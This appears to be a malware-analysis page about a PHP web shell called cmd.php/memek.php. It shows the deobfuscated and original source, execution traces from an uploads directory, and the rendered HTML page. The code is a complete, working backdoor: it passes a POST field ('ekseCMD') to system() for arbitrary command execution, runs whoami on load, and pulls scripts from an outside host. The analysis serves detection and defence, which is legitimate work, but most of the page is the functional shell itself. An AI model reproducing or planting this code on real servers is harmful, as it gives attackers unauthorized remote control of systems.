cmd.php, memek.php

md5: b1c8840d92018cc758f58d77bb95bfb5

Jump to:
Deobfuscated code (Read more)
Execution traces (Read more)
Generated HTML (Read more)
Original Code (Read more)
Screenshot
Attributes
Execution
system (Deobfuscated, Original)

Input
_GET (Deobfuscated, Original)
_POST (Deobfuscated, Original)

Title
unkn0wnsec@cmd:#~ shell (Deobfuscated, HTML, Original)

URLs
ftp.sh/main/style-fm.css (Deobfuscated, HTML, Original)
ftp.sh/typed/typed.js (Deobfuscated, HTML, Original)

Deobfuscated PHP code
<?php

if ($_GET['id'] == 'cmd') {
    if (isset($_POST['ekseCMD'])) {
        $result = $_POST['ekseCMD'];
        print "<b>Unkn0wnSec<cmd>@</cmd>cmd#:~</b> <cmd>{$result}</cmd><br>";
        system($_POST['ekseCMD'] . ' 2>&1');
    }
    exit;
}
?>
<!DOCTYPE html>
<html lang="en">
	<head>
		<meta charset="UTF-8">
		<meta name="viewport" content="width=device-width, initial-scale=1">
		<title>unkn0wnsec@cmd:#~ shell</title>
		<link rel="stylesheet" href="//unknownsec.ftp.sh/main/style-fm.css">
		<script src="//code.jquery.com/jquery-1.6.2.js"></script>
	</head>
<style>
.shell {
	max-width: 800px;
	border-radius: 5px;
	border: 1px solid rgba(255, 255, 255, 0.4);
	font-size: 10pt;
	display: flex;
	flex-direction: column;
	align-items: stretch;
}
.pre {
	height: 300px;
	overflow: auto;
	padding: 5px;
	white-space: pre-wrap;
	flex-grow: 1;
}
.nana p span.typed-text {
	font-weight: normal;
	color: #dd7732;
}
.nana p span.cursor {
	display: inline-block;
	background-color: #ccc;
	margin-left: 0.1rem;
	width: 2px;
	animation: blink 1s infinite;
}
.nana p span.cursor.typing {
	animation: none;
}
cmd {
	color: #dd7732;
}
@keyframes blink {
	0% {background-color: #ccc;}
	49% {background-color: #ccc;}
	50% {background-color: transparent;}
	99% {background-color: transparent;}
	100% {background-color: #ccc;}
}
</style>
<body class="bg-dark text-secondary">
<div class="container-fluid">
	<div class="py-3" id="main">
		<div class="box shadow bg-dark p-4 rounded-3">
		<div class="nana">
			<p>Comand#:~ <span class="typed-text"></span><span class="cursor">&nbsp;</span></p>
		</div>
			<form action="?id=cmd" id="comand">
				<div class="shell bg-dark">
					<pre class="pre text-light" id="result"><b>Unkn0wnSec<cmd>@</cmd>cmd#:~</b> <br><?php 
system("whoami", $result);
?></pre>
				</div>
				<div class="form-group input-group">
					<div class="input-group-text"><i class="bi bi-terminal"></i></div><input type="text" class="form-control" name="ekseCMD" id="cmd">
				</div>
			</form>
			<br>
			<div class="text-center">&copy; <?php 
echo date('Y');
?> UnknownSec</div>
		</div>
	</div>
</div>
<script>
$("#comand").submit(function(event) {
	event.preventDefault();
	act = $("#comand").attr("action");
	ex_cmd = $("#cmd").val();
	ekse = {ekseCMD:ex_cmd};
	$.post(act,ekse,result);
});
function result(data,textStatus) {
	$("#result").html(data);
}
</script>
<script src="//unknownsec.ftp.sh/typed/typed.js"></script>
</body>
</html>
Execution traces
data/traces/b1c8840d92018cc758f58d77bb95bfb5_trace-1676238692.6263.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 19:51:58.524167]
1	0	1	0.000220	393512
1	3	0	0.000303	398568	{main}	1		/var/www/html/uploads/memek.php	0	0
2	4	0	0.000353	398592	system	0		/var/www/html/uploads/memek.php	71	2	'whoami'	NULL
2	4	1	0.001790	398704
2	4	R			'www-data'
2	5	0	0.001818	398592	date	0		/var/www/html/uploads/memek.php	78	1	'Y'
2	5	1	0.001878	400944
2	5	R			'2023'
1	3	1	0.001896	400656
			0.001927	314280
TRACE END   [2023-02-12 19:51:58.525921]

data/traces/b1c8840d92018cc758f58d77bb95bfb5_trace-1676256127.6132.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:42:33.511006]
1	0	1	0.000185	393512
1	3	0	0.000257	398568	{main}	1		/var/www/html/uploads/cmd.php	0	0
2	4	0	0.000295	398592	system	0		/var/www/html/uploads/cmd.php	71	2	'whoami'	NULL
2	4	1	0.001773	398704
2	4	R			'www-data'
2	5	0	0.001803	398592	date	0		/var/www/html/uploads/cmd.php	78	1	'Y'
2	5	1	0.001864	400944
2	5	R			'2023'
1	3	1	0.001883	400656
			0.001919	314280
TRACE END   [2023-02-13 00:42:33.512774]

Generated HTML code
<html lang="en"><head>
		<meta charset="UTF-8">
		<meta name="viewport" content="width=device-width, initial-scale=1">
		<title>unkn0wnsec@cmd:#~ shell</title>
		<link rel="stylesheet" href="//unknownsec.ftp.sh/main/style-fm.css">
		<script src="//code.jquery.com/jquery-1.6.2.js"></script>
	<style>
.shell {
	max-width: 800px;
	border-radius: 5px;
	border: 1px solid rgba(255, 255, 255, 0.4);
	font-size: 10pt;
	display: flex;
	flex-direction: column;
	align-items: stretch;
}
.pre {
	height: 300px;
	overflow: auto;
	padding: 5px;
	white-space: pre-wrap;
	flex-grow: 1;
}
.nana p span.typed-text {
	font-weight: normal;
	color: #dd7732;
}
.nana p span.cursor {
	display: inline-block;
	background-color: #ccc;
	margin-left: 0.1rem;
	width: 2px;
	animation: blink 1s infinite;
}
.nana p span.cursor.typing {
	animation: none;
}
cmd {
	color: #dd7732;
}
@keyframes blink {
	0% {background-color: #ccc;}
	49% {background-color: #ccc;}
	50% {background-color: transparent;}
	99% {background-color: transparent;}
	100% {background-color: #ccc;}
}
</style></head>

<body class="bg-dark text-secondary">
<div class="container-fluid">
	<div class="py-3" id="main">
		<div class="box shadow bg-dark p-4 rounded-3">
		<div class="nana">
			<p>Comand#:~ <span class="typed-text">usage &gt; whoami | id | uname</span><span class="cursor typing">&nbsp;</span></p>
		</div>
			<form action="?id=cmd" id="comand">
				<div class="shell bg-dark">
					<pre class="pre text-light" id="result"><b>Unkn0wnSec<cmd>@</cmd>cmd#:~</b> <br>www-data
</pre>
				</div>
				<div class="form-group input-group">
					<div class="input-group-text"><i class="bi bi-terminal"></i></div><input type="text" class="form-control" name="ekseCMD" id="cmd">
				</div>
			</form>
			<br>
			<div class="text-center">© 2023 UnknownSec</div>
		</div>
	</div>
</div>
<script>
$("#comand").submit(function(event) {
	event.preventDefault();
	act = $("#comand").attr("action");
	ex_cmd = $("#cmd").val();
	ekse = {ekseCMD:ex_cmd};
	$.post(act,ekse,result);
});
function result(data,textStatus) {
	$("#result").html(data);
}
</script>
<script src="//unknownsec.ftp.sh/typed/typed.js"></script>

</body></html>
Original PHP code
<?php
if($_GET['id'] == 'cmd') {
if(isset($_POST['ekseCMD'])) {
	$result = $_POST['ekseCMD'];
		print "<b>Unkn0wnSec<cmd>@</cmd>cmd#:~</b> <cmd>$result</cmd><br>";
		system($_POST['ekseCMD'].' 2>&1');
	}
exit;
}
?>
<!DOCTYPE html>
<html lang="en">
	<head>
		<meta charset="UTF-8">
		<meta name="viewport" content="width=device-width, initial-scale=1">
		<title>unkn0wnsec@cmd:#~ shell</title>
		<link rel="stylesheet" href="//unknownsec.ftp.sh/main/style-fm.css">
		<script src="//code.jquery.com/jquery-1.6.2.js"></script>
	</head>
<style>
.shell {
	max-width: 800px;
	border-radius: 5px;
	border: 1px solid rgba(255, 255, 255, 0.4);
	font-size: 10pt;
	display: flex;
	flex-direction: column;
	align-items: stretch;
}
.pre {
	height: 300px;
	overflow: auto;
	padding: 5px;
	white-space: pre-wrap;
	flex-grow: 1;
}
.nana p span.typed-text {
	font-weight: normal;
	color: #dd7732;
}
.nana p span.cursor {
	display: inline-block;
	background-color: #ccc;
	margin-left: 0.1rem;
	width: 2px;
	animation: blink 1s infinite;
}
.nana p span.cursor.typing {
	animation: none;
}
cmd {
	color: #dd7732;
}
@keyframes blink {
	0% {background-color: #ccc;}
	49% {background-color: #ccc;}
	50% {background-color: transparent;}
	99% {background-color: transparent;}
	100% {background-color: #ccc;}
}
</style>
<body class="bg-dark text-secondary">
<div class="container-fluid">
	<div class="py-3" id="main">
		<div class="box shadow bg-dark p-4 rounded-3">
		<div class="nana">
			<p>Comand#:~ <span class="typed-text"></span><span class="cursor">&nbsp;</span></p>
		</div>
			<form action="?id=cmd" id="comand">
				<div class="shell bg-dark">
					<pre class="pre text-light" id="result"><b>Unkn0wnSec<cmd>@</cmd>cmd#:~</b> <br><?php system("whoami", $result);?></pre>
				</div>
				<div class="form-group input-group">
					<div class="input-group-text"><i class="bi bi-terminal"></i></div><input type="text" class="form-control" name="ekseCMD" id="cmd">
				</div>
			</form>
			<br>
			<div class="text-center">&copy; <?=date('Y');?> UnknownSec</div>
		</div>
	</div>
</div>
<script>
$("#comand").submit(function(event) {
	event.preventDefault();
	act = $("#comand").attr("action");
	ex_cmd = $("#cmd").val();
	ekse = {ekseCMD:ex_cmd};
	$.post(act,ekse,result);
});
function result(data,textStatus) {
	$("#result").html(data);
}
</script>
<script src="//unknownsec.ftp.sh/typed/typed.js"></script>
</body>
</html>
PHP Malware Analysis

cmd.php, memek.php

md5: b1c8840d92018cc758f58d77bb95bfb5

Screenshot

Attributes

Deobfuscated PHP code

Execution traces

Generated HTML code

Original PHP code
